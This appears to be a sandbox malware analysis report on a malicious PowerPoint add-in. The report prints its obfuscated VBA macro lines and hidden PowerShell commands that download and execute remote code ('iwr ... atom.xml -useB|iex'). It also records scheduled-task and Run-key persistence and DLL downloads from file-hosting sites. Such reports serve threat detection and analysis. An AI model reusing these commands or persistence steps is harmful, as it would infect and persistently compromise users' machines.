          Source: global traffic, HTTP traffic detected: GET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: www.mediafire.com Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: 5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /u45xa78x9nkg/5avuvurhf9r42y3/6.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: download2262.mediafire.com Cookie: ukey=8gv80wkxqbda9mv7zrd52a2eanmh8cy0 Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /1rxjqgtrygkg/5avuvurhf9r42y3/6.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: download2262.mediafire.com Cookie: ukey=s7huv8g43j1r0etull8h9ns6aiwyny7l Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: www.j.mp Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: bit.ly Connection: Keep-Alive

          System Summary:

          Document contains an embedded VBA macro which may execute processes
          Source: ~DF85570804A0D29ED2.TMP.7.dr, OLE, VBA macro line: GetObject("new:13709620-C279-11CE-A49E-444553540000").Shellexecute ca.lc.Tag, jojo.jiji.Tag + jiajsijasd, "" , StrReverse("n" + "e" + "p" + "o"), 0
          Document contains an embedded VBA macro with suspicious strings
          Source: ~DF85570804A0D29ED2.TMP.7.dr, OLE, VBA macro line: jiajsijasd = "C:\Users\" & Environ("UserName") & "\Pictures\notnice" + "." + "ps1"
          Source: ~DF85570804A0D29ED2.TMP.7.dr, OLE, VBA macro line: GetObject("new:13709620-C279-11CE-A49E-444553540000").Shellexecute ca.lc.Tag, jojo.jiji.Tag + jiajsijasd, "" , StrReverse("n" + "e" + "p" + "o"), 0
          Source: ~DF85570804A0D29ED2.TMP.7.dr, OLE, VBA macro line: Sub Auto_Open()
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Code function: 31_2_0134B0BA NtQuerySystemInformation,31_2_0134B0BA
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Code function: 31_2_0134B089 NtQuerySystemInformation,31_2_0134B089
          Source: ~DF85570804A0D29ED2.TMP.7.dr, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: POWERPNT.box.7.dr, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~DF9BC36A1CA590193F.TMP.7.dr, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: sfc.dll
          Source: ~DF85570804A0D29ED2.TMP.7.dr, OLE indicator, VBA macros: true
          Source: 3.ppam, ReversingLabs: Detection: 25%
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: unknown, Process created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE "C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" /AUTOMATION -Embedding
          Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\3.ppam"
          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou "
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
          Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p26ynn.blogspot.com/atom.xml" -useB|iex;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Code function: 31_2_0134AF3E AdjustTokenPrivileges,31_2_0134AF3E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Code function: 31_2_0134AF07 AdjustTokenPrivileges,31_2_0134AF07
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, File created: C:\Users\user\AppData\Local\Temp\{CB4D47A4-9AA7-472C-ACE9-B71CE8A887CE} - OProcSessId.dat
          Source: classification engine, Classification label: mal100.troj.expl.evad.winPPAM@27/30@17/9
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, File read: C:\Users\desktop.ini
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_01
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3860:120:WilError_01
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_01
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_01
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_01
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Window found: window name: SysTabControl32
          Source: Window Recorder, Window detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll
          Source: POWERPNT.box.7.dr, Initial sample: OLE indicators vbamacros = False
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Code function: 31_2_01343265 push edi; ret 31_2_01343266
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Code function: 31_2_01343169 push edi; ret 31_2_0134316A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Code function: 31_2_01342815 push eax; ret 31_2_01342816
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Code function: 31_2_01342C10 push eax; ret 31_2_01342C12
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Code function: 31_2_0134285D push edi; ret 31_2_0134285E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Code function: 31_2_0134288D push esi; ret 31_2_0134288E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Code function: 31_2_01342808 push ecx; ret 31_2_0134280A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Code function: 31_2_01342689 push edi; ret 31_2_0134268A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, Code function: 31_2_030F4E70 pushad ; iretd 31_2_030F4E71

          Persistence and Installation Behavior:


          Boot Survival:

          Creates an autostart registry key pointing to binary in C:\Windows
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NetwrixParam
          Creates autostart registry keys with suspicious values (likely registry only malware)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NetwrixParam powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Uses known network protocols on non-standard portsShow sources
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
